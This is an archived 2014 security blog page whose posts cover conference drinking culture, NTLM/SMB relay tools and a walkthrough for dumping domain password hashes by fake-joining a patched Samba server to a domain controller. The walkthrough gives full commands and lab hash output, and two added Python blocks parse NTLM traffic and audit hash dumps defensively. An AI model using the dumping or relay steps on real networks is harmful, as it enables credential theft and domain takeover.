
Tuesday, May 27, 2014

Why Good Leaders Make You Feel Safe

This talk really hit home with me and I wanted to share it, and not just because he talked about Marines. ;–)

Forward this talk on to your fellow employees, boss, etc.


Monday, May 26, 2014

Go Home InfoSec, You're Drunk

Let me start off by saying this post is easy for me to write in one respect, as I’ve never been a heavy drinker or much enjoyed the taste of alcohol. So if you need a reason to disregard what I say next, I leave the door open.

I am still pretty much a runt in the infosec community, as I didn’t even begin learning computers (outside of playing games on them) until 2005. However, one thing that has nagged at me for a long time is the intertwined nature of hacking/infosec and drinking. It’s almost a rite of passage in the common fraternity style. The problem lies in the fact that you don’t really “graduate” and leave those parties behind.

Now, I have certainly partaken in my share of parties and consumption, even with that nagging feeling in the back of my head. It didn’t really take root until just recently. I was at a conference where a student (who was not 21) that looked very much like an older version of my oldest child said that he was going to skip dinner to go get wasted with XYZ “Infosec Rockstar”.

That scared me into thinking that if my son goes into infosec he will basically be expected to drink like an alcoholic. How can I want my kid to be expected (not forced) to drink a shot on stage if he gets accepted to speak at DEF CON?

We (the infosec community) are few, and we lose too many to idiotic things like drug overdose, drinking and driving, and other stupidly preventable crap. For that reason I actually don’t want to share the thing I feel so passionate about with my own kids.

My call to action is this:

If you are a conference goer, try going one con completely dry, and if you already do, maybe ask a friend to join you.

If you are a speaker, enough of the drinks on stage and drinking games. Do you really want the next generation, those you are trying to teach, to remember that part of your talk instead of the rest?

If you are a conference organizer, maybe a completely dry day at the con? Or an AA meeting space?

If you are a podcaster and you drink during the cast, make it about the taste and selection, instead of how wasted and totally useless the next hour of your listeners’ lives will be.

ShmooCon runs an AA meeting at the con.

Let’s stop losing our friends and family because we are too weak to say ‘no thank you’ when someone approaches the dais with a shot.

Wednesday, May 21, 2014

Installing PyCrypto on OSX Mavericks

Keeping it here for notes and just in case anyone else runs into this same issue.

brew install pip
sudo ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future pip install pycrypto

If you have a better way please leave a comment below!

Effective NTLM / SMB Relaying

SMB Relay has been around for a long while. I even have a post about using it along with LNK files here: MS08-068 + MS10-046 = Fun until 2018

Here is the problem, though. Most of the tools that exploit it either catch the authentication as an NTLMv2/NTLMv1 challenge-response (which is not always easy to crack) or assume administrative access (because they attempt to PSEXEC with the incoming session). Well, since MS08-068 that’s much harder to pin down. You have to know who is going to hit your relay server and what other host they might be an admin on. You also have to have a service you want to run on that target.
Current Tools:
“Soft” relay tools:

Now, some would argue that you just spin up the relay at a target then leave it until one pops. I’m not really a fan of that. You will not only be creating multiple access attempt log entries, but you are also just throwing away all of those user authentication attempts. There are 3 tools that agree with me.

Squirtle

Squirtle is awesome, plus it’s written in a language I understand (Ruby), but it has one serious downfall: many of the post-auth features are left up to the user to develop. It does have a great API but needs some coding to get it to do certain things.

Intercepter-NG

I have tested Intercepter-NG a lot and it has some fantastic features, not to mention that it does relaying on a Windows host, which is impressive all by itself (because Windows already binds port 445 by default). My only problem with it is that it’s closed source. But it is definitely recommended.

Zack Attack

The third is a tool called “ZackAttack” by Zack Fasel; you can find it here on GitHub: ZackAttack. You can find the video of the talk releasing this tool on YouTube. So what is so special about this tool? Other than the fact that most of the web interface is horribly broken, it has this amazing bit of code that acts as a SOCKS proxy. This SOCKS proxy identifies SMB or HTTP traffic that has NTLM authentication going on and rewrites it based on captured sessions.

What does this mean? If I use SpiderLabs’ Responder, for instance, to spoof/get/fake a bunch of users into connecting to my machine (via automatic or forced methods) to the capture/keep services that ZackAttack spins up, I can then run smbclient, Outlook or a web browser, push it through the ZackAttack SOCKS proxy, pick a username out of the captured names, and use any password I want when asked; the SOCKS proxy will automatically replace it en route with the valid session information.

This way I can use every authentication that comes in to its highest potential for pwnage. The video below shows how this can be used to connect to a “Network share”.

Update: One thing to mention that ZackAttack does that I haven’t seen other tools do, even Squirtle or Intercepter-NG, is getting 3+ successful authentications out of a single relay from a user. ZackAttack does this with some clever HTTP Keep-Alive and SMB “reauth” kung fu.
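The proxy described above works by recognising NTLM authentication inside SMB and HTTP streams; that same recognition is what an IDS or a relay-exposure check does from the other side. The following Python is an added illustration, not code from ZackAttack, Squirtle or any other tool named here: it parses NTLMSSP messages (raw from SMB, or base64-encoded in an HTTP Authorization header) and reports the two properties that decide whether a relay can reuse the exchange, whether session signing was negotiated and whether the response is NTLMv1 or NTLMv2. The flag values and field offsets follow MS-NLMP; build_type3 and the account names in the test are constructed fixtures.

```python
import base64
import struct

NTLMSSP_SIG = b"NTLMSSP\x00"
FLAGS = {"UNICODE": 0x1, "SIGN": 0x10, "SEAL": 0x20, "ALWAYS_SIGN": 0x8000,
         "EXT_SESSION_SECURITY": 0x80000, "KEY_EXCH": 0x40000000}  # MS-NLMP NegotiateFlags
FLAG_OFFSET = {1: 12, 2: 20, 3: 60}  # where NegotiateFlags sits in each message type

def _field(data, off):
    """Read a Len/MaxLen/Offset triple and return the payload bytes it points at."""
    length, _maxlen, offset = struct.unpack_from("<HHI", data, off)
    return data[offset:offset + length]

def parse_ntlm(data):
    """Describe a NEGOTIATE (1), CHALLENGE (2) or AUTHENTICATE (3) NTLMSSP message."""
    msg_type = struct.unpack_from("<I", data, 8)[0] if data[:8] == NTLMSSP_SIG else 0
    if msg_type not in FLAG_OFFSET:
        raise ValueError("not a recognised NTLMSSP message")
    flags = struct.unpack_from("<I", data, FLAG_OFFSET[msg_type])[0]
    info = {"type": msg_type,
            "flags": sorted(n for n, bit in FLAGS.items() if flags & bit),
            # did the client ask for session signing? (SMB also enforces its own signing setting)
            "signing": bool(flags & (FLAGS["SIGN"] | FLAGS["ALWAYS_SIGN"]))}
    if msg_type == 3:
        enc = "utf-16-le" if flags & FLAGS["UNICODE"] else "ascii"
        info["domain"] = _field(data, 28).decode(enc)
        info["user"] = _field(data, 36).decode(enc)
        info["workstation"] = _field(data, 44).decode(enc)
        # an NTLMv1 NtChallengeResponse is exactly 24 bytes; NTLMv2 is longer
        info["ntlm_version"] = 2 if len(_field(data, 20)) > 24 else 1
    return info

def parse_http_auth(header_value):
    """Same bytes as on the SMB wire, base64-encoded in 'Authorization: NTLM <b64>'."""
    scheme, _, b64 = header_value.strip().partition(" ")
    return parse_ntlm(base64.b64decode(b64)) if scheme.upper() == "NTLM" else None

def as_http_auth(msg):
    return "NTLM " + base64.b64encode(msg).decode("ascii")

def build_type3(domain, user, workstation, nt_response, flags):
    """Constructed test fixture only: pack a minimal AUTHENTICATE_MESSAGE (no Version/MIC)."""
    enc = "utf-16-le" if flags & FLAGS["UNICODE"] else "ascii"
    items = [b"", nt_response, domain.encode(enc), user.encode(enc), workstation.encode(enc), b""]
    fields, payload = b"", b""
    for item in items:  # payload starts at offset 64, right after NegotiateFlags
        fields += struct.pack("<HHI", len(item), len(item), 64 + len(payload))
        payload += item
    return NTLMSSP_SIG + struct.pack("<I", 3) + fields + struct.pack("<I", flags) + payload
```

An NTLMv1 response with no signing flags is the case a relay profits from most; an NTLMv2 exchange with signing negotiated and enforced by the SMB server cannot be replayed to that server.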


Other References:

I tried finding all the original/semi original references about SMB (LM/NTLM) Relaying. If you have others please leave a comment below so I can add them to the list.

Tuesday, May 20, 2014

CCDC Red Teamer's Creed

This is my box. There are many like it, but they are all mine.

My malware is my best friend. It is my life. I must master it as I must master my life.

My malware, without me, is useless. Without my malware, I am useless. I must drop my malware true. I must rootkit better than my enemy who is trying to kill my binary. I must kit him before he kits me. I will…

My malware and I know that what counts in this war is not the boxes we pop, the noise of our root dance, nor the cheers coming from the Red Team room. We know that it is the root that counts. We will root…

My malware is human, even as I, because it is my life. Thus, I will learn it as a brother. I will learn its weaknesses, its strength, its parts, its extensions, its dlls and its exes. I will keep my malware av free and ready, even as I am ready. We will become part of each other. We will…

Before God, I swear this creed. My malware and I are the defenders of my botnet. We are the masters of our enemy. We are the saviors of my shells.

So be it, until victory is the Red Team’s and there is no enemy, but peace!


Wednesday, May 14, 2014

Dumping NTDS.dit Domain Hashes Using Samba

So there was this blog post by @lanjelot (definitely someone to follow) that talked about a number of ways to dump Windows credentials, here: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ and at the very bottom of this post it says “AD Replication (EXPERIMENTAL)”.

What it boils down to is this: if you can position a system that can do DNS resolution for the target domain and perform some other UDP traffic, you can fake-join a Samba server you control to the domain, and it doesn’t require code execution of any kind on the domain controller.

Note: I am not doing this on a Kali Linux box; there is already an install of Samba there and I didn’t want to try uninstalling or modifying the one installed.

First, you need this patch:

wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt

and Samba 4.1.0

wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz

You will probably also require some dependencies to be installed:

apt-get install python2.7-dev python-samba libacl1-dev build-essential libldap2-dev libkrb5-dev attr

Since the patch is kinda wonky, you need to make a src directory and extract Samba into it first. Then apply the patch from whatever directory is above src:

mkdir src
mv samba-4.1.0.tar.gz src/
cd src/
tar zxvf samba-4.1.0.tar.gz
cd /root/

So it would look like this:

samba-4.1.0_replication-only-patch.txt
src/
src/samba-4.1.0/

then run:

patch -p0 < samba-4.1.0_replication-only-patch.txt

cd ./src/samba-4.1.0/
./configure
make
make install

Prepare the box:

rm -rf /var/lib/samba; mkdir /var/lib/samba; rm -f /etc/samba/smb.conf

Next you need to make sure you are resolving correctly: if you can’t resolve the SRV record _ldap._tcp.sittingduck.info (sittingduck.info being the domain), then this isn’t going to work.

echo nameserver 192.168.92.37 > /etc/resolv.conf

"192.168.92.37" being the IP address of the DC

Then start the clone:

/usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator

Looks like this:

root@sambabox:~/src/samba-4.1.0# /usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator
Finding a writeable DC for domain 'sittingduck.info'
Found DC 2K8DC.sittingduck.info
Password for [SITTINGDUCK\administrator]:
workgroup is SITTINGDUCK
realm is sittingduck.info
Calling bare provision
No IPv6 address will be assigned
Provision OK for domain DN DC=sittingduck,DC=info
Starting replication
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1521] linked_values[0]
Analyze and apply schema objects
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1608] linked_values[1]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1614] linked_values[11]
Replicating critical objects from the base DN of the domain
Partition[DC=sittingduck,DC=info] objects[100] linked_values[24]
Partition[DC=sittingduck,DC=info] objects[353] linked_values[27]
Done with always replicated NC (base, config, schema)
Committing SAM database
descriptor_sd_propagation_recursive: DC=DomainDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
descriptor_sd_propagation_recursive: DC=ForestDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
Joined domain SITTINGDUCK (SID S-1-5-21-3147519476-3247671789-820278723) as a DC

Then to get the hashes:

root@sambabox:~# /usr/local/samba/bin/pdbedit -L -w
2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S]:LCT-530FC425:
Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U]:LCT-531006A4:
krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU]:LCT-530FC3FF:
nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U]:LCT-00000000:
jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX]:LCT-530FC5FF:
uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX]:LCT-53101261:

Or you can do it with history:

root@sambabox:~# python samba-pwdump.py /usr/local/samba/private/sam.ldb.d/DC\=SITTINGDUCK\,DC\=INFO.ldb -history
SAMBACLONE$:1104:::::
2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
Guest:501:::::
jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::

Game over. The great thing is that it never actually shows up as a joined box in the domain, and as far as I can tell the only log on the real DC is the login success of a domain admin. Another huge benefit of this method is that once you have the database, Samba makes it really easy to query information like group membership or user info after the fact, not just hashes.
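Both dumps above are colon-separated: pdbedit prints smbpasswd format (user:uid:LM:NT:[flags]:LCT-hex:) and samba-pwdump.py prints pwdump format (user:rid:LM:NT:::). The following Python is added here and is not part of the post, of Samba or of samba-pwdump.py: it parses both formats, decodes the LCT last-change time and groups accounts by NT hash, which is the first audit a defender runs over such a dump, because accounts with the same NT hash share a password (in the output above Administrator, jdoe and uber do). The sample lines are copied from the two outputs above; the function names are mine.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

MASKED = re.compile(r"^(X{32})?$")  # pdbedit prints 32 X's for a hash it will not show; pwdump leaves it empty

# Sample lines copied from the pdbedit (smbpasswd format) and samba-pwdump (pwdump format) output above
SAMPLE = """\
2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S]:LCT-530FC425:
Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U]:LCT-531006A4:
krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU]:LCT-530FC3FF:
jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX]:LCT-530FC5FF:
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::
"""

def parse_hash_line(line):
    """Parse one smbpasswd-style (user:uid:LM:NT:[flags]:LCT-hex:) or pwdump-style (user:rid:LM:NT:::) line."""
    parts = line.rstrip("\n").split(":")
    if len(parts) < 4:
        return None
    entry = {"user": parts[0], "rid": int(parts[1]),
             "lm": None if MASKED.match(parts[2]) else parts[2].lower(),
             "nt": None if MASKED.match(parts[3]) else parts[3].lower(),
             "flags": "", "last_change": None}
    if len(parts) > 5 and parts[4].startswith("["):
        entry["flags"] = parts[4].strip("[]").strip()  # U user, D disabled, S/W machine or trust, X no expiry
        if parts[5].startswith("LCT-"):  # last change time: hex seconds since the Unix epoch
            entry["last_change"] = datetime.fromtimestamp(int(parts[5][4:], 16), tz=timezone.utc)
    return entry

def parse_dump(text):
    return [e for e in (parse_hash_line(l) for l in text.splitlines()) if e]

def shared_nt_hashes(entries):
    """Map each NT hash shared by 2+ accounts to those accounts; user_historyN rows fold into their user."""
    by_hash = defaultdict(set)
    for e in entries:
        if e["nt"]:
            by_hash[e["nt"]].add(re.sub(r"_history\d+$", "", e["user"]))
    return {h: sorted(users) for h, users in by_hash.items() if len(users) > 1}

def machine_and_disabled(entries):
    """Return (machine/trust accounts, disabled accounts) so user-account statistics exclude them."""
    return ([e["user"] for e in entries if set(e["flags"]) & {"S", "W"}],
            [e["user"] for e in entries if "D" in e["flags"]])
```

A domain admin sharing an NT hash with ordinary user accounts, as the sample shows, is the finding to act on first; the LCT timestamps also make stale, never-rotated passwords visible without cracking anything.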
